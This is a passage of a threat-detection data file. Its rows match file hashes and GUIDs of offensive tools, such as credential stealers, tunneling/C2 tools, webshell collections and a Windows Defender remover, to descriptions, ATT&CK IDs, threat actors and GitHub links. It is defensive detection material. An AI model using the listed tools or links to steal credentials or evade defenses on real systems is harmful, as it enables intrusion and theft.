TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","23195" 
"*22379d19123e498aef75b4ed162a7c94361c1c23745cbae792e2242540997a61*",".{0,1000}22379d19123e498aef75b4ed162a7c94361c1c23745cbae792e2242540997a61.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23197" "*22379d69fa7ac3ae6679aba9a2346d5e66e819384641782e033f4a6efc4097c3*",".{0,1000}22379d69fa7ac3ae6679aba9a2346d5e66e819384641782e033f4a6efc4097c3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","23198" "*223c6a71be1b15a6b28dbe13bcb8ed5ca46b71b0e1bc014edbac35e3d61dcfd1*",".{0,1000}223c6a71be1b15a6b28dbe13bcb8ed5ca46b71b0e1bc014edbac35e3d61dcfd1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23200" 
"*2242362e7144103ecd965687227503de0483d4e7636218b1dd28cc01752bdb0f*",".{0,1000}2242362e7144103ecd965687227503de0483d4e7636218b1dd28cc01752bdb0f.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","23202" "*2244c46e179fdec505ac4c6af1725468c69ac6d97526b411ff251098c35948a8*",".{0,1000}2244c46e179fdec505ac4c6af1725468c69ac6d97526b411ff251098c35948a8.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","23203" "*224d47658e0e7ddc256eb97725179a35e42fed02f7717cf5b62afbae26dcb36b*",".{0,1000}224d47658e0e7ddc256eb97725179a35e42fed02f7717cf5b62afbae26dcb36b.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","23205" "*2251b9a7c19ed7f416bdabc535c42682d838e512feef856e7e42c97287a6cd8e*",".{0,1000}2251b9a7c19ed7f416bdabc535c42682d838e512feef856e7e42c97287a6cd8e.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","23207" "*2257aeb5d063b08394d05286d7d9adfb5850571ea4ffff9ec3d06eb5af75f0e9*",".{0,1000}2257aeb5d063b08394d05286d7d9adfb5850571ea4ffff9ec3d06eb5af75f0e9.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","23208" "*225ae3f948ca67c0f37ad69a5ce542c27c370993806599aeb927079bf8553acb*",".{0,1000}225ae3f948ca67c0f37ad69a5ce542c27c370993806599aeb927079bf8553acb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23209" 
"*2260d4489a10ffc6b950e15a2a30ce95e644c891393b8ad1378f71e1cb2e52b5*",".{0,1000}2260d4489a10ffc6b950e15a2a30ce95e644c891393b8ad1378f71e1cb2e52b5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23210" "*226665adcfee00d7db13e8e27e1ab21560a8f9dbe581adb42ea2474d84171349*",".{0,1000}226665adcfee00d7db13e8e27e1ab21560a8f9dbe581adb42ea2474d84171349.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23213" "*2273ad36e35b7acbbc7ff15649c2ed3683c7d1c35f12f33e41019744be19029a*",".{0,1000}2273ad36e35b7acbbc7ff15649c2ed3683c7d1c35f12f33e41019744be19029a.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","23216" "*2273f47d253c1974f82b9b7f9018228080e8ac41b75bba4e779fe9f918d72aa1*",".{0,1000}2273f47d253c1974f82b9b7f9018228080e8ac41b75bba4e779fe9f918d72aa1.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","#filehash","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","23217" "*227c72ed-494a-4d29-9170-5e5994c12f5c*",".{0,1000}227c72ed\-494a\-4d29\-9170\-5e5994c12f5c.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","#GUIDproject","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","23218" "*227cc3d2c07ef203c39afe00c81943cf245d626c1efa1b32024d7229604635e5*",".{0,1000}227cc3d2c07ef203c39afe00c81943cf245d626c1efa1b32024d7229604635e5.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","#filehash","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","23219" "*227f0eeb2991708692c78418ff7e45562670a00f6a72a4157adcc28d5f2f5b4f*",".{0,1000}227f0eeb2991708692c78418ff7e45562670a00f6a72a4157adcc28d5f2f5b4f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23220" "*227f64a66fdac6a31e3bd7f7f18232e99464008b66cd7c6163441540eaecdfcb*",".{0,1000}227f64a66fdac6a31e3bd7f7f18232e99464008b66cd7c6163441540eaecdfcb.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23221" "*228e75216d4b2482e113e36823f9367ed46eae2d63a083c915bc282b709e758f*",".{0,1000}228e75216d4b2482e113e36823f9367ed46eae2d63a083c915bc282b709e758f.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - 
T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","#filehash","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","23222" "*228eb663a1c8bfc0f6a05ba522038844c762319961b07e5b623dcfa8e30ce5fa*",".{0,1000}228eb663a1c8bfc0f6a05ba522038844c762319961b07e5b623dcfa8e30ce5fa.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#filehash","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","23223" "*2297A528-E866-4056-814A-D01C1C305A38*",".{0,1000}2297A528\-E866\-4056\-814A\-D01C1C305A38.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","23224" "*2297be424ff20b0f2e6fdae7e2929014a7eae91cf1743d929c889627a2aae2dd*",".{0,1000}2297be424ff20b0f2e6fdae7e2929014a7eae91cf1743d929c889627a2aae2dd.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","23225" 
"*22986734a47c09453ffda17227be0a2bc1ab4875aca8ad84444a603577afb646*",".{0,1000}22986734a47c09453ffda17227be0a2bc1ab4875aca8ad84444a603577afb646.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","23226" "*22A156EA-2623-45C7-8E50-E864D9FC44D3*",".{0,1000}22A156EA\-2623\-45C7\-8E50\-E864D9FC44D3.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","23228" "*22A156EA-2623-45C7-8E50-E864D9FC44D3*",".{0,1000}22A156EA\-2623\-45C7\-8E50\-E864D9FC44D3.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","#GUIDproject","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","23229" "*22ad6469693f482c5ece8da4241b4c0e6e1d22f2a99b5efeba8a5e96e16d1410*",".{0,1000}22ad6469693f482c5ece8da4241b4c0e6e1d22f2a99b5efeba8a5e96e16d1410.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - 
TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23230" "*22bb4f8fe6d57072e57342b605ec5ad9e08c4489c3b6849f2928bdf7ea23ca45*",".{0,1000}22bb4f8fe6d57072e57342b605ec5ad9e08c4489c3b6849f2928bdf7ea23ca45.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23232" "*22c276ff5b6b7158990cbeddea6368894e0b4477c11ea714b8b30401096f92df*",".{0,1000}22c276ff5b6b7158990cbeddea6368894e0b4477c11ea714b8b30401096f92df.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23234" "*22c75c356f7e3a118f3fb98fe16c5c9232e3834e631ea1bb2af6a923f57b7b0b*",".{0,1000}22c75c356f7e3a118f3fb98fe16c5c9232e3834e631ea1bb2af6a923f57b7b0b.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23236" "*22c8f466cbb5c2845a9f943374032a476ed03ef4ff0b8398012554e0109e5849*",".{0,1000}22c8f466cbb5c2845a9f943374032a476ed03ef4ff0b8398012554e0109e5849.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23238" "*22da237375fe569c7cb42482b9c3a8266d138a6174253ec5652ef6cd5ecc955b*",".{0,1000}22da237375fe569c7cb42482b9c3a8266d138a6174253ec5652ef6cd5ecc955b.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","23241" "*22df0e3fcbba509c1e28a0df720e8a36b62f731ee3bf6066dbd2d6ed09592052*",".{0,1000}22df0e3fcbba509c1e28a0df720e8a36b62f731ee3bf6066dbd2d6ed09592052.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","23243" "*22eb92e656efbf120016e4483ae92a7accfb20c307faf7b17debf52da27277ca*",".{0,1000}22eb92e656efbf120016e4483ae92a7accfb20c307faf7b17debf52da27277ca.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23246" 
"*22ebd5b1976f3135b19ba715edef95821cf7990bb2670f2359f0137bc01f35ac*",".{0,1000}22ebd5b1976f3135b19ba715edef95821cf7990bb2670f2359f0137bc01f35ac.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23247" "*22ee00e26aed0e9dc83b202584c5f8ea81147c64d85233d1ae6b5929c8351ed5*",".{0,1000}22ee00e26aed0e9dc83b202584c5f8ea81147c64d85233d1ae6b5929c8351ed5.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","23248" "*22f3cfc7bd97c20e7a313b9710a41426f42fcbf4bb6dbe108a36c92c328737a4*",".{0,1000}22f3cfc7bd97c20e7a313b9710a41426f42fcbf4bb6dbe108a36c92c328737a4.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23249" "*22f6a8fb8771a0ed253a3652c6852a831b4919b2a677ddb6a6d03cad6a0f76f6*",".{0,1000}22f6a8fb8771a0ed253a3652c6852a831b4919b2a677ddb6a6d03cad6a0f76f6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23250" "*22f7e0f4c88ff065df8e983b5cd2bb1cb7e218e7eddbf34a950711cff3657dc9*",".{0,1000}22f7e0f4c88ff065df8e983b5cd2bb1cb7e218e7eddbf34a950711cff3657dc9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23251" "*22f7fe7f3c58f04ba3e26f3b779dd14bfed6aff19d4d9e6fa290ae2ce0d71f51*",".{0,1000}22f7fe7f3c58f04ba3e26f3b779dd14bfed6aff19d4d9e6fa290ae2ce0d71f51.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23252" "*22fb8aa73c70f98115846b88d6dba267df70e65ed16fe26d0241b206864537f0*",".{0,1000}22fb8aa73c70f98115846b88d6dba267df70e65ed16fe26d0241b206864537f0.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23253" "*22fdc29d790bb072a0bd54651adab4892fb1df1c75fb44388c3d6a0b0506d908*",".{0,1000}22fdc29d790bb072a0bd54651adab4892fb1df1c75fb44388c3d6a0b0506d908.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23254" "*22fe06596a11d40b5607f1d7a51a5a6655aa33b63693e0499a0d8b03276e44f5*",".{0,1000}22fe06596a11d40b5607f1d7a51a5a6655aa33b63693e0499a0d8b03276e44f5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23255" "*230184a9e6df447df04c22c92e6cb0d494d210fb6ec4b3350d16712d1e85d6b9*",".{0,1000}230184a9e6df447df04c22c92e6cb0d494d210fb6ec4b3350d16712d1e85d6b9.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","0","#filehash","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","23256" "*2301aca49d1e6f829a8859b41ea4decd4fb0451691733859018646bf047164f6*",".{0,1000}2301aca49d1e6f829a8859b41ea4decd4fb0451691733859018646bf047164f6.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","23257" "*2305237cb1b9b2320b7e62741e4a8835777462f59c9584dbcfd0672e6f2c8150*",".{0,1000}2305237cb1b9b2320b7e62741e4a8835777462f59c9584dbcfd0672e6f2c8150.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23258" "*2308bdcf6b10c8d36213bbb8afba67549558c4cd9b112493b9e9d4b7e2d365ca*",".{0,1000}2308bdcf6b10c8d36213bbb8afba67549558c4cd9b112493b9e9d4b7e2d365ca.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","23259" "*23092e288c27221ba793178e177a04309cf5c6073e2a022f5c4035252d69086d*",".{0,1000}23092e288c27221ba793178e177a04309cf5c6073e2a022f5c4035252d69086d.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#filehash","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","23260" "*2309aee5d6244b80e7b1f98d62c87d68e97e0acaf233688af07b6a8439f85b7d*",".{0,1000}2309aee5d6244b80e7b1f98d62c87d68e97e0acaf233688af07b6a8439f85b7d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23261" "*23169d2107567f31b9cde9d04b8a9aeee99c34dc3261c81fd7a897a603ec4606*",".{0,1000}23169d2107567f31b9cde9d04b8a9aeee99c34dc3261c81fd7a897a603ec4606.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used 
by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23262" "*231df570906bdb24f33a92f48448f5ebf4c648fd71c6977956a58adae14aebbc*",".{0,1000}231df570906bdb24f33a92f48448f5ebf4c648fd71c6977956a58adae14aebbc.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23263" "*2321bcf59fc695ef50c4c540af7c4f76343e9ea8d1989ed0d30f33b705147d25*",".{0,1000}2321bcf59fc695ef50c4c540af7c4f76343e9ea8d1989ed0d30f33b705147d25.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
